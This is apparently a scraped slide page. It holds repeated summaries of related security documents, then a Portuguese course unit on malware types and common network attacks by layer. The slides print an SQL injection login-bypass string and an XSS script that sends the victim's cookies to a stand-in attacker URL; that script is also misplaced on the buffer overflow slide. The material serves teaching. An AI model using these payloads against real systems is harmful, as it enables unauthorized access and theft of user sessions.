O documento descreve os principais tipos de malwares e ataques de rede, incluindo como funcionam vírus, worms, trojans, backdoors e outros. Ele também explica ataques como SQL injection, buffer overflow, spoofing de IP/MAC e ataques de negação de serviço.
O documento discute vários tipos de ataques de segurança de rede, como SQL injection, XSS, buffer overflow, ataques DoS e spoofing. Ele também fornece exemplos reais desses ataques e dicas sobre como se proteger, como filtrar dados de entrada, escapar saídas, atualizar softwares e configurar firewalls.
O documento descreve as ferramentas airmon-ng, airodump-ng e aireplay-ng para habilitar o modo monitor em placas wireless, capturar pacotes 802.11 e injetar frames sem fio respectivamente. Airmon-ng é usado para ativar o modo monitor, airodump-ng para capturar pacotes e aireplay-ng para injetar frames e realizar ataques como desautenticação, autenticação falsa e repetição de pacotes.
1) O comando ipconfig / all verificará se a pilha TCP/IP está funcionando corretamente no PC ao mostrar os detalhes da configuração de rede.
2) O comando ping 127.0.0.1 confirmará se a interface de loopback está funcionando.
3) Os comandos traceroute e ping podem ser usados para identificar problemas de conectividade com o gateway ou sites remotos.
1) O documento discute o uso da ferramenta Nmap para avaliar a segurança de uma rede em ambientes Linux.
2) O Nmap permite escanear hosts em uma rede para descobrir quais portas estão abertas e quais serviços estão sendo utilizados, fornecendo informações valiosas para a gestão de segurança da rede.
3) O artigo apresenta demonstrações práticas do uso do Nmap e do Zenmap, sua interface gráfica, escaneando hosts em uma rede da UFPA para identificar portas abertas, sistemas oper
El documento describe un ataque de DNS spoofing donde un atacante redirige el tráfico DNS de una víctima hacia un sitio web clonado para robar sus credenciales de Facebook. El atacante identifica la red, cambia la MAC address de su interfaz de red, clona el sitio de Facebook, modifica el archivo DNS para apuntar a su sitio clonado, y lanza el ataque de ARP spoofing para capturar las credenciales de la víctima cuando ingresa a Facebook.
Este documento presenta información sobre topologías de redes LAN, ataques comunes en redes LAN y cómo protegerse de ellos. Describe las topologías en estrella y anillo para redes LAN. Explica que los ataques incluyen accesos no autorizados, ataques spoofing y de inundación MAC. Recomienda configurar port security en los switches para restringir dispositivos autorizados y detectar intrusiones.
O documento apresenta uma introdução sobre bots e botnets, explicando o que são, como funcionam e os riscos que podem causar, como DDoS, spam e roubo de dados. Também fornece dicas para detecção e combate, como análise de tráfego de rede, uso de IDS e honeypots.
O documento discute vários tipos de ataques de segurança de rede, como SQL injection, XSS, buffer overflow, ataques DoS e spoofing. Ele também fornece exemplos reais desses ataques e dicas sobre como se proteger, como filtrar dados de entrada, escapar saídas, atualizar softwares e configurar firewalls.
O documento descreve as ferramentas airmon-ng, airodump-ng e aireplay-ng para habilitar o modo monitor em placas wireless, capturar pacotes 802.11 e injetar frames sem fio respectivamente. Airmon-ng é usado para ativar o modo monitor, airodump-ng para capturar pacotes e aireplay-ng para injetar frames e realizar ataques como desautenticação, autenticação falsa e repetição de pacotes.
1) O comando ipconfig / all verificará se a pilha TCP/IP está funcionando corretamente no PC ao mostrar os detalhes da configuração de rede.
2) O comando ping 127.0.0.1 confirmará se a interface de loopback está funcionando.
3) Os comandos traceroute e ping podem ser usados para identificar problemas de conectividade com o gateway ou sites remotos.
1) O documento discute o uso da ferramenta Nmap para avaliar a segurança de uma rede em ambientes Linux.
2) O Nmap permite escanear hosts em uma rede para descobrir quais portas estão abertas e quais serviços estão sendo utilizados, fornecendo informações valiosas para a gestão de segurança da rede.
3) O artigo apresenta demonstrações práticas do uso do Nmap e do Zenmap, sua interface gráfica, escaneando hosts em uma rede da UFPA para identificar portas abertas, sistemas oper
El documento describe un ataque de DNS spoofing donde un atacante redirige el tráfico DNS de una víctima hacia un sitio web clonado para robar sus credenciales de Facebook. El atacante identifica la red, cambia la MAC address de su interfaz de red, clona el sitio de Facebook, modifica el archivo DNS para apuntar a su sitio clonado, y lanza el ataque de ARP spoofing para capturar las credenciales de la víctima cuando ingresa a Facebook.
Este documento presenta información sobre topologías de redes LAN, ataques comunes en redes LAN y cómo protegerse de ellos. Describe las topologías en estrella y anillo para redes LAN. Explica que los ataques incluyen accesos no autorizados, ataques spoofing y de inundación MAC. Recomienda configurar port security en los switches para restringir dispositivos autorizados y detectar intrusiones.
O documento apresenta uma introdução sobre bots e botnets, explicando o que são, como funcionam e os riscos que podem causar, como DDoS, spam e roubo de dados. Também fornece dicas para detecção e combate, como análise de tráfego de rede, uso de IDS e honeypots.
O documento discute o que é um firewall e como funciona o Netfilter e IPTables no Linux. Em resumo:
1) Um firewall é um mecanismo de segurança que filtra pacotes de rede de acordo com regras definidas para proteger redes internas.
2) No Linux, o Netfilter e IPTables fornecem recursos de firewall no kernel, permitindo filtrar pacotes e fazer tradução de endereços de rede (NAT).
3) O IPTables permite definir regras usando comandos como -A, -D, -L para adicionar, remover e list
Netfilter e Iptables são ferramentas de firewall para Linux que permitem filtrar pacotes de rede, mascarar endereços e redirecionar portas. Iptables fornece uma interface para configurar as regras de filtragem implementadas pelo kernel Linux através do módulo Netfilter. O documento explica como essas ferramentas funcionam e como podem ser usadas para proteger redes e aplicar políticas de segurança.
Interceptar palavras passes de páginas web em uma rede sem fiosDerek Budde
Este trabalho apresenta como um ataque ARP spoofing, pode comprometer a segurança da navegação do utilizador em uma página da internet. Aborda e demonstra o conceito da técnica, bem como o ataque em uma rede sem fios. Também aborda alguns conceitos de protecção e a estrutura de como o ataque é realizado.
O documento descreve as camadas da arquitetura TCP/IP e a comunicação entre dispositivos em uma rede. As principais camadas são:
1) Camada física - responsável pela transmissão de sinais elétricos ou ópticos entre dispositivos conectados;
2) Camada de enlace - gerencia os endereços MAC e tabelas de roteamento para envio de dados na rede local;
3) Camada de rede - utiliza endereços IP para roteamento de pacotes entre redes diferentes através de roteadores.
http://www.blog.clavis.com.br/webinar-17-analise-de-malware-em-forense-computacional/
Qual foi o objetivo deste novo webinar da Clavis Segurança da Informação?
Este Webinar apresentou algumas das técnicas para análise de malware, incluindo análise de strings, unpacking e análise do tráfego de rede. Os ouvintes aprenderam a adequar o ambiente de avaliação conforme demandado pelo código malicioso. Como demonstração, foi apresentado a análise do malware Slackbot.
Veja mais sobre o curso Análise de Malware em Forense Computacional(http://www.clavis.com.br/treinamento-ensino-a-distancia-ead/analise-de-malware-em-forense-computacional/). Este é um dos inúmeros assuntos abordados na Formação de 100 horas — Perito em Análise Forense Computacional — Academia Clavis Segurança da Informação(http://www.blog.clavis.com.br/formacao-de-100-horas-perito-em-analise-forense-computacional-academia-clavis-seguranca-da-informacao/).
Quem ministrou o Webinar?
Davidson Rodrigo Boccardo é Doutor em Engenharia Elétrica pela Universidade Estadual Paulista (UNESP) com período sanduíche no Center for Advanced Computer Studies da University of Louisiana at Lafayette. Atualmente é pesquisador no Instituto Nacional de Metrologia, Qualidade e Tecnologia, e tem atuado nos seguintes temas: engenharia reversa, análise de software/malware, ofuscação de software, incorruptibilidade de software e marca d’água em software.
Este Webinar foi realizado com a mesma infraestrutura de um treinamento EAD da Academia Clavis(http://www.clavis.com.br/treinamento-ensino-a-distancia-ead/). É portanto uma excelente oportunidade para que você conheça o sistema utilizado pela Academia Clavis Segurança da Informação.
O documento discute mitos e problemas relacionados à segurança de redes IPv6, como a falsificação de anúncios de vizinhança e a captura de pacotes sem criptografia. Também apresenta técnicas como SEND, RA Guard e ND Inspecion para melhorar a segurança da descoberta de vizinhança e prevenir ataques de spoofing e man-in-the-middle.
O documento discute técnicas de teste de penetração (pen test) utilizando a distribuição Backtrack Linux. Aborda ferramentas como Nmap, Nikto e SQLMap para varredura de portas e detecção de vulnerabilidades, além de Weevely e John the Ripper para exploração de backdoors e quebra de senhas respectivamente.
Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...Luiz Arthur
1) O documento propõe uma arquitetura autonômica que combina sistemas de detecção de intrusão com redes definidas por software para mitigar ameaças de segurança em redes de computadores.
2) A arquitetura proposta foi implementada em um protótipo chamado Of-IDPS e testada em experimentos que avaliaram sua capacidade de detectar e reagir a diferentes tipos de ataques.
3) Os resultados dos experimentos mostraram que a arquitetura foi efetiva em identificar desequilíbrios causados por
Este documento resume os principais tópicos sobre redes de computadores TCP/IP. Apresenta a ementa do curso que inclui redes sem fio, redes com qualidade de serviço e VPNs. Descreve a arquitetura TCP/IP em quatro camadas e compara com o modelo OSI. Explica conceitos como encapsulamento, protocolo IP, roteamento e fragmentação.
O documento discute técnicas de ataques cibernéticos, incluindo ARP spoofing e DNS spoofing. Ele explica como os ataques ocorrem e fornece detalhes sobre como explorar vulnerabilidades em protocolos como ARP e DNS para comprometer a segurança da rede e dos sistemas.
[1] O documento discute o protocolo IPv6, comparando-o com IPv4 e abordando tópicos como estrutura de endereçamento, IPsec, ICMPv6, firewall, descoberta de vizinhança e ataques/vulnerabilidades em IPv6. [2] É apresentada uma ferramenta online para testar compatibilidade com IPv6 e sites compatíveis, além de dicas para ativar IPv6 em sistemas Debian, Ubuntu e Slackware. [3] São explicados os modos de funcionamento do IPsec (transporte e túnel), além
O documento descreve um ataque de "Man in the Middle" em que um atacante intercepta comunicações criptografadas entre um cliente e um servidor, permitindo que o atacante leia e modifique os dados da comunicação. O atacante gera um certificado falso e redireciona o tráfego do cliente para si, enganando o cliente e permitindo que o atacante leia os dados criptografados usando sua própria chave privada.
O documento discute as causas de atraso e perda de pacotes em redes comutadas por pacotes, listando quatro fontes principais de atraso: processamento nodal, enfileiramento, transmissão e propagação. Também aborda conceitos como vazão, camadas de protocolo, encapsulamento, segurança de rede e tipos comuns de ataques cibernéticos.
O documento apresenta um trabalho sobre análise de logs realizado por Diego Souza e Igor Antônio para a disciplina de Segurança de Redes de Computadores da Universidade Estácio de Sá no Rio de Janeiro em 2011. O trabalho discute conceitos como CAIS, bot, botnet, análise de tráfego de rede e procedimentos para identificar e solucionar problemas de segurança.
O documento descreve o que é um programa de captura de pacotes (packet sniffer), como funciona ao capturar pacotes de rede em modo promíscuo e como isso pode expor senhas e dados transmitidos sem criptografia. Também discute usos legítimos de sniffers para administração de rede e formas de proteger redes, como switches e criptografia em protocolos e túneis VPN.
O documento discute princípios de segurança na internet, incluindo como a internet foi projetada inicialmente sem considerar segurança e como os ataques se tornaram mais sofisticados ao longo do tempo. Também descreve vários tipos de ataques como negação de serviço, exploração de bugs e protocolos, e mecanismos de defesa como criptografia e filtros de pacotes.
Linux network administration | Curso de Redes | 3Way Networks3Way Networks
O documento apresenta os conceitos básicos de redes TCP/IP, incluindo protocolos, endereçamento IP, configuração de rede, ferramentas de monitoramento e acesso remoto via SSH.
Ccna1 10 - fundamentos de routing e de sub-redesTaurux Vaz
Este documento descreve conceitos básicos de routing e protocolos de routing. Explica como os routers usam protocolos de routing e métricas para determinar o melhor caminho através da rede e encaminhar pacotes de dados de forma eficiente.
O capítulo discute protocolos da camada de aplicação, cobrindo:
1) Princípios e exemplos de protocolos populares como HTTP, FTP, SMTP/POP3/IMAP e DNS
2) Arquiteturas cliente-servidor e peer-to-peer
3) Como aplicações se comunicam através de sockets e endereçamento de processos
Este documento discute ataques de negação de serviço distribuídos (DDoS), definindo-os e descrevendo suas variantes, como ICMP, UDP e TCP flooding. Também aborda ferramentas e ataques realizados por grupos hacktivistas entre 2008-2012, focando em ataques DDoS HTTP e possíveis soluções de detecção e prevenção em sistemas Linux. Por fim, propõe um modelo para identificar e tratar especificamente ataques DDoS GET HTTP.
O documento discute o projeto lógico de uma rede local, abordando 4 tópicos principais: 1) projeto da topologia e esquema da rede, 2) seleção de protocolos, 3) desenvolvimento de estratégias de segurança e gerência, 4) conceitos de topologia de rede como mapas indicando segmentos, pontos de interconexão e tipos de dispositivos.
O documento discute o que é um firewall e como funciona o Netfilter e IPTables no Linux. Em resumo:
1) Um firewall é um mecanismo de segurança que filtra pacotes de rede de acordo com regras definidas para proteger redes internas.
2) No Linux, o Netfilter e IPTables fornecem recursos de firewall no kernel, permitindo filtrar pacotes e fazer tradução de endereços de rede (NAT).
3) O IPTables permite definir regras usando comandos como -A, -D, -L para adicionar, remover e list
Netfilter e Iptables são ferramentas de firewall para Linux que permitem filtrar pacotes de rede, mascarar endereços e redirecionar portas. Iptables fornece uma interface para configurar as regras de filtragem implementadas pelo kernel Linux através do módulo Netfilter. O documento explica como essas ferramentas funcionam e como podem ser usadas para proteger redes e aplicar políticas de segurança.
Interceptar palavras passes de páginas web em uma rede sem fiosDerek Budde
Este trabalho apresenta como um ataque ARP spoofing, pode comprometer a segurança da navegação do utilizador em uma página da internet. Aborda e demonstra o conceito da técnica, bem como o ataque em uma rede sem fios. Também aborda alguns conceitos de protecção e a estrutura de como o ataque é realizado.
O documento descreve as camadas da arquitetura TCP/IP e a comunicação entre dispositivos em uma rede. As principais camadas são:
1) Camada física - responsável pela transmissão de sinais elétricos ou ópticos entre dispositivos conectados;
2) Camada de enlace - gerencia os endereços MAC e tabelas de roteamento para envio de dados na rede local;
3) Camada de rede - utiliza endereços IP para roteamento de pacotes entre redes diferentes através de roteadores.
http://www.blog.clavis.com.br/webinar-17-analise-de-malware-em-forense-computacional/
Qual foi o objetivo deste novo webinar da Clavis Segurança da Informação?
Este Webinar apresentou algumas das técnicas para análise de malware, incluindo análise de strings, unpacking e análise do tráfego de rede. Os ouvintes aprenderam a adequar o ambiente de avaliação conforme demandado pelo código malicioso. Como demonstração, foi apresentado a análise do malware Slackbot.
Veja mais sobre o curso Análise de Malware em Forense Computacional(http://www.clavis.com.br/treinamento-ensino-a-distancia-ead/analise-de-malware-em-forense-computacional/). Este é um dos inúmeros assuntos abordados na Formação de 100 horas — Perito em Análise Forense Computacional — Academia Clavis Segurança da Informação(http://www.blog.clavis.com.br/formacao-de-100-horas-perito-em-analise-forense-computacional-academia-clavis-seguranca-da-informacao/).
Quem ministrou o Webinar?
Davidson Rodrigo Boccardo é Doutor em Engenharia Elétrica pela Universidade Estadual Paulista (UNESP) com período sanduíche no Center for Advanced Computer Studies da University of Louisiana at Lafayette. Atualmente é pesquisador no Instituto Nacional de Metrologia, Qualidade e Tecnologia, e tem atuado nos seguintes temas: engenharia reversa, análise de software/malware, ofuscação de software, incorruptibilidade de software e marca d’água em software.
Este Webinar foi realizado com a mesma infraestrutura de um treinamento EAD da Academia Clavis(http://www.clavis.com.br/treinamento-ensino-a-distancia-ead/). É portanto uma excelente oportunidade para que você conheça o sistema utilizado pela Academia Clavis Segurança da Informação.
O documento discute mitos e problemas relacionados à segurança de redes IPv6, como a falsificação de anúncios de vizinhança e a captura de pacotes sem criptografia. Também apresenta técnicas como SEND, RA Guard e ND Inspecion para melhorar a segurança da descoberta de vizinhança e prevenir ataques de spoofing e man-in-the-middle.
O documento discute técnicas de teste de penetração (pen test) utilizando a distribuição Backtrack Linux. Aborda ferramentas como Nmap, Nikto e SQLMap para varredura de portas e detecção de vulnerabilidades, além de Weevely e John the Ripper para exploração de backdoors e quebra de senhas respectivamente.
Uma Arquitetura Autonômica para Detecção e Reação a Ameaças de Segurança em R...Luiz Arthur
1) O documento propõe uma arquitetura autonômica que combina sistemas de detecção de intrusão com redes definidas por software para mitigar ameaças de segurança em redes de computadores.
2) A arquitetura proposta foi implementada em um protótipo chamado Of-IDPS e testada em experimentos que avaliaram sua capacidade de detectar e reagir a diferentes tipos de ataques.
3) Os resultados dos experimentos mostraram que a arquitetura foi efetiva em identificar desequilíbrios causados por
Este documento resume os principais tópicos sobre redes de computadores TCP/IP. Apresenta a ementa do curso que inclui redes sem fio, redes com qualidade de serviço e VPNs. Descreve a arquitetura TCP/IP em quatro camadas e compara com o modelo OSI. Explica conceitos como encapsulamento, protocolo IP, roteamento e fragmentação.
O documento discute técnicas de ataques cibernéticos, incluindo ARP spoofing e DNS spoofing. Ele explica como os ataques ocorrem e fornece detalhes sobre como explorar vulnerabilidades em protocolos como ARP e DNS para comprometer a segurança da rede e dos sistemas.
[1] O documento discute o protocolo IPv6, comparando-o com IPv4 e abordando tópicos como estrutura de endereçamento, IPsec, ICMPv6, firewall, descoberta de vizinhança e ataques/vulnerabilidades em IPv6. [2] É apresentada uma ferramenta online para testar compatibilidade com IPv6 e sites compatíveis, além de dicas para ativar IPv6 em sistemas Debian, Ubuntu e Slackware. [3] São explicados os modos de funcionamento do IPsec (transporte e túnel), além
O documento descreve um ataque de "Man in the Middle" em que um atacante intercepta comunicações criptografadas entre um cliente e um servidor, permitindo que o atacante leia e modifique os dados da comunicação. O atacante gera um certificado falso e redireciona o tráfego do cliente para si, enganando o cliente e permitindo que o atacante leia os dados criptografados usando sua própria chave privada.
O documento discute as causas de atraso e perda de pacotes em redes comutadas por pacotes, listando quatro fontes principais de atraso: processamento nodal, enfileiramento, transmissão e propagação. Também aborda conceitos como vazão, camadas de protocolo, encapsulamento, segurança de rede e tipos comuns de ataques cibernéticos.
O documento apresenta um trabalho sobre análise de logs realizado por Diego Souza e Igor Antônio para a disciplina de Segurança de Redes de Computadores da Universidade Estácio de Sá no Rio de Janeiro em 2011. O trabalho discute conceitos como CAIS, bot, botnet, análise de tráfego de rede e procedimentos para identificar e solucionar problemas de segurança.
O documento descreve o que é um programa de captura de pacotes (packet sniffer), como funciona ao capturar pacotes de rede em modo promíscuo e como isso pode expor senhas e dados transmitidos sem criptografia. Também discute usos legítimos de sniffers para administração de rede e formas de proteger redes, como switches e criptografia em protocolos e túneis VPN.
O documento discute princípios de segurança na internet, incluindo como a internet foi projetada inicialmente sem considerar segurança e como os ataques se tornaram mais sofisticados ao longo do tempo. Também descreve vários tipos de ataques como negação de serviço, exploração de bugs e protocolos, e mecanismos de defesa como criptografia e filtros de pacotes.
Linux network administration | Curso de Redes | 3Way Networks3Way Networks
O documento apresenta os conceitos básicos de redes TCP/IP, incluindo protocolos, endereçamento IP, configuração de rede, ferramentas de monitoramento e acesso remoto via SSH.
Ccna1 10 - fundamentos de routing e de sub-redesTaurux Vaz
Este documento descreve conceitos básicos de routing e protocolos de routing. Explica como os routers usam protocolos de routing e métricas para determinar o melhor caminho através da rede e encaminhar pacotes de dados de forma eficiente.
O capítulo discute protocolos da camada de aplicação, cobrindo:
1) Princípios e exemplos de protocolos populares como HTTP, FTP, SMTP/POP3/IMAP e DNS
2) Arquiteturas cliente-servidor e peer-to-peer
3) Como aplicações se comunicam através de sockets e endereçamento de processos
Este documento discute ataques de negação de serviço distribuídos (DDoS), definindo-os e descrevendo suas variantes, como ICMP, UDP e TCP flooding. Também aborda ferramentas e ataques realizados por grupos hacktivistas entre 2008-2012, focando em ataques DDoS HTTP e possíveis soluções de detecção e prevenção em sistemas Linux. Por fim, propõe um modelo para identificar e tratar especificamente ataques DDoS GET HTTP.
O documento discute o projeto lógico de uma rede local, abordando 4 tópicos principais: 1) projeto da topologia e esquema da rede, 2) seleção de protocolos, 3) desenvolvimento de estratégias de segurança e gerência, 4) conceitos de topologia de rede como mapas indicando segmentos, pontos de interconexão e tipos de dispositivos.
Este documento fornece instruções para configurar o serviço CUPS em um sistema CentOS para permitir o acesso de clientes na rede local 192.168.0.0/24. As etapas incluem instalar os pacotes CUPS, editar o arquivo de configuração cupsd.conf para ouvir na interface de rede correta e reiniciar o serviço CUPS.
O documento descreve como configurar o serviço Samba-SWAT em um sistema CentOS para fornecer acesso de administração remota via navegador web. Ele inclui instruções para instalar o pacote swat, editar o arquivo de configuração xinetd.d/swat para habilitar o serviço na porta 901 e reiniciar o serviço xinetd para ativar a configuração. Também fornece instruções para habilitar o serviço swat no boot e acessá-lo via navegador web no IP do servidor na porta 9
O documento descreve os passos para configurar o serviço Samba em um servidor CentOS para compartilhamento de arquivos e diretórios. Inclui a instalação do pacote Samba, a configuração do arquivo smb.conf, a criação de usuários e diretórios compartilhados, e como configurar clientes Windows para acessar os recursos compartilhados.
O documento descreve os passos para realizar um pentest em uma máquina vulnerável à vulnerabilidade MS08-067 utilizando o Metasploit: 1) usar o nmap para verificar a vulnerabilidade, 2) iniciar o Metasploit, 3) escolher o exploit MS08-067, 4) definir o alvo, 5) escolher o payload, 6) definir o IP do atacante e 7) executar o ataque.
O documento fornece instruções para configurar um servidor FTP no CentOS usando o vsftpd e conectar um cliente Windows ao servidor usando o WinSCP. Ele descreve como instalar e iniciar o serviço vsftpd no servidor CentOS e configurar o cliente Windows para se conectar ao servidor usando seu endereço IP, usuário e senha.
O documento fornece instruções para configurar acesso remoto SSH entre um servidor CentOS e um cliente Windows XP. Ele descreve como instalar e iniciar o serviço OpenSSH no servidor CentOS e como baixar e executar o cliente Putty no Windows para se conectar remotamente ao servidor usando seu endereço IP.
Este documento fornece instruções para configurar o serviço NFS em um sistema operacional Linux. Ele explica como instalar os pacotes necessários, editar o arquivo de configuração /etc/exports para compartilhar diretórios, iniciar os serviços rpcbind e nfs, e montar os compartilhamentos em um cliente NFS.
1. O documento fornece instruções sobre ferramentas de varredura de rede como whois, dig e Nmap, bem como sobre a instalação e uso do scanner de vulnerabilidades Nessus.
2. Ele explica como usar whois e dig para obter informações sobre domínios e como usar várias opções de Nmap para realizar varreduras em hosts e redes, como verificar versões de serviço.
3. Também mostra como instalar e configurar o Nessus em sistemas Linux, iniciar varreduras e visualizar relatórios para identificar possíveis
O documento discute as etapas de um ataque de rede, incluindo footprint (levantamento de informações), scan de rede (varredura de portas) e enumeração de serviços e vulnerabilidades para invasão. Ele fornece exemplos de ferramentas como WHOIS, dig, NMAP e Nessus que podem ser usadas nessas etapas.
Este documento descreve como quebrar a criptografia WEP em redes sem fio usando ferramentas como aircrack-ng. Ele explica como ativar o modo monitor, realizar uma varredura na rede, gerar tráfego usando aireplay-ng e então usar o aircrack-ng para descobrir a senha WEP capturando pacotes.
O documento discute a evolução da segurança em redes sem fio, desde as primeiras tecnologias proprietárias na década de 1990, passando pela padronização IEEE 802.11 em 1997 e pelos problemas de segurança do WEP, até as soluções mais robustas introduzidas pelo IEEE 802.11i em 2004, como AES, CCMP, 802.1x e EAP.
1) O documento discute criptografia e certificação digital em uma disciplina de segurança de redes.
2) A criptografia simétrica e assimétrica são explicadas como formas de manter mensagens seguras ao criptografar e decifrar com chaves.
3) A certificação digital é descrita como assinando digitalmente chaves públicas por uma autoridade confiável para formar certificados digitais.
O documento fornece instruções para configurar um servidor DNS no CentOS:
1) Instalar o pacote bind e suas dependências
2) Criar o arquivo de configuração named.conf e definir zonas
3) Configurar arquivos de zona master e testar a resolução de nomes
Este documento discute o serviço DNS, explicando que ele não é um banco de dados, mas sim um grande diretório distribuído que mapeia nomes de domínio para endereços IP, permitindo que programas localizem recursos na Internet. Ele também descreve como consultas DNS funcionam de forma iterativa ou recursiva, e componentes do software BIND usado para implementar servidores DNS.
1) O documento fornece instruções para instalar e configurar um servidor web Apache em um sistema CentOS.
2) Ele instrui o usuário a instalar o pacote httpd com yum, criar um diretório e arquivo de índice em /var/www/site, e configurar um VirtualHost no arquivo site.conf.
3) Por fim, inicia o serviço httpd e testa o acesso ao site pela URL do servidor.
Este documento descreve os passos para criar uma Autoridade Certificadora (CA) usando a ferramenta OpenSSL: 1) Preparar o ambiente com diretórios e arquivos de configuração; 2) Gerar um par de chaves pública e privada para a CA; 3) Criar um certificado raiz assinado pela própria CA; 4) Gerar um Pedido de Assinatura de Certificado (CSR) para um cliente; 5) Assinar o CSR para emitir o certificado do cliente.
O documento discute conceitos de criptografia como criptografia simétrica e assimétrica, assinatura digital e certificados digitais. A criptografia simétrica é exemplificada com meninas na escola trocando mensagens secretas. A criptografia assimétrica é apresentada como solução para o problema de compartilhamento de chaves na criptografia simétrica. Assinatura digital é definida como forma de garantir integridade e autenticidade das mensagens através de resumo criptográfico. Por fim, cert
O documento descreve o serviço WEB e como instalar e configurar um servidor Apache no Linux. Ele explica que o Apache é o software padrão que implementa um servidor WEB no Linux e fornece detalhes sobre suas versões, módulos e capacidades. Também lista os comandos e arquivos necessários para instalar e configurar o Apache, incluindo o diretório onde os arquivos do site são armazenados.
1. Técnico de Manutenção e Suporte em Informática
Disciplina - Segurança da Informação
Unidade 2 – Malwares e Ataques mais comuns
Prof. Leandro Cavalcanti de Almeida
lcavalcanti.almeida@gmail.com
@leandrocalmeida
4. Vírus
Trecho de código, geralmente em assembler, que
é injetado dentro de outro aplicativo
Modo de Operação: necessidade de um código
hospedeiro para sobreviver e replicar. Necessita
da ação do usuário
Vírus
5. Keylogger
Aplicativo voltado para capturar tudo o que se é
digitado no teclado
Modo de Operação: aplicativo captura tudo que é
digitado e envia de tempos em tempos para o
atacante
Keylogger
6. Worm
Aplicativo que realiza escaneamentos na rede em
busca de hosts vulneráveis. Não necessita da ação
do usuário
Modo de Operação: Se instala e replica entre
hosts na rede de forma cíclica
Worms
7. Bot
Robô, que possui funcionalidades de worms, e fica
aguardando a ordem do seu mestre para realizar
ataques a outros computadores
Modo de Operação: Após o comando do mestre
realiza um DoS em algum outro host na rede
Bot
8. RootKit
Aplicativo que têm como finalidade permitir
acesso privilegiado a um invasor, escondendo
seus rastros
Modo de Operação: Geralmente se camufla em
outros processos do sistema e abre uma
backdoor para acessos remotos não
autorizados
Rootkits
9. Backdoor
Aplicativo que têm como finalidade permitir
acesso remoto através da abertura não autorizada
de uma porta
Modo de Operação: Geralmente habilitam uma
porta alta para acessos não autorizados
Backdoors
10. Spywares
Aplicativo que têm como finalidade coletar
informações estatísticas dos hosts e enviá-las ao
atacante
Modo de Operação: Monitoram processos e
conexões de rede e enviam essas
informações so atacante
Spywares
11. Cavalo de Tróia
Presente de grego camuflado em arquivos como
fotos, cartões virtuas, jogos,... que tem funções
destrutivas
Modo de Operação: após a vítima baixar o
“presente” o trojan instala outro Malware
Cavalo
de
Tróia
12. Ataques
Aplicação Sql Injection XSS
Buffer Overflow
Transporte TCP SYN FLOOD UDP FLOOD
Main in the Middle
Rede IP Spoofing ICMP Flooding
STP Attack
Enlace ARP Spoofing
ARP Poisoning
Físico MAC Spoofing
13. SQL Injection
Ex : Sistema de autenticação em PHP
Imagine se o usuário inserir os dados abaixo...
Login: qualquer coisa
Senha: ' OR '1'='1
SELECT * FROM usuarios WHERE login='qualquer coisa' AND senha = '' OR '1'='1'
Essa query SQL retornará todos os registros da tabela usuários!
14. XSS
Suposição:Facebook vulnerável a Cross-Site Scripting
Usuário ingênuo clica no link...
<script>
Document.location =
'http://sitedocracker.com/roubarcokkies.php=' + document.cookie
</script>
Insere um código(html, Javascript,...) malicioso no lugar de um post na
base de dados do facebook
15. Buffer Overflow
char nome[4]; int idade;
L E O 0 2 0
Entrada: LEO idade: 20
char nome[4]; int idade;
L E O O A 0
<script>
Document.location =
'http://sitedocracker.com/roubarcokkies.php=' + document.cookie
</script>
Entrada: LEOOA idade: 65
16. TCP SYN FLOOD
SYN
SYN-ACK
ACK
SYN
SYN
SYN
SYN
SYN
SYN
17. UDP FLOOD
UDP – porta qualquer
UDP – porta qualquer
UDP – porta qualquer
UDP – porta qualquer
UDP – porta qualquer
UDP – porta qualquer
18. Main in the Middle
Packet
Packet
Packet
Packet
19. IP Spoofing
Packet
Packet
10.0.0.1
Packet
Packet 10.0.0.254
Packet
Packet
Atacante envia pacotes IP falsificados para
a vítima, se passando por outro host na
10.0.0.1 rede!
22. ARP Spoofing
Packet
Packet
IP: 10.0.0.1
MAC:
Packet
68:A3:C4:9B:73:54
IP: 10.0.0.254
Packet
MAC: 52:54:00:69:42:4A
arpspoof
Packet
Packet
Atacante envia pacotes ARP falsificados
IP: 10.0.0.2 para a vítima, se passando por outro host
MAC:
na rede!
68:A3:C4:9B:73:54
23. ARP Poisoning
IP: 10.0.0.1
MAC:68:A3:C4:9B:73:54
1 MAC IP: 10.0.0.254
2 MAC MAC: 52:54:00:69:42:4A
Packet
3 MAC
4 MAC
5 MAC
6 MAC
Atacante envenena a tabela ARP do Switch
IP: 10.0.0.2
MAC: 68:A3:C4:9B:73:54
24. MAC Spoofing
Packet
Packet
68:A3:C4:9B:73:54
Packet
52:54:00:69:42:4A
Packet
Packet
Atacante envia pacotes com endereço MAC
falsificado para a vítima, se passando por
68:A3:C4:9B:73:54 outro host na rede!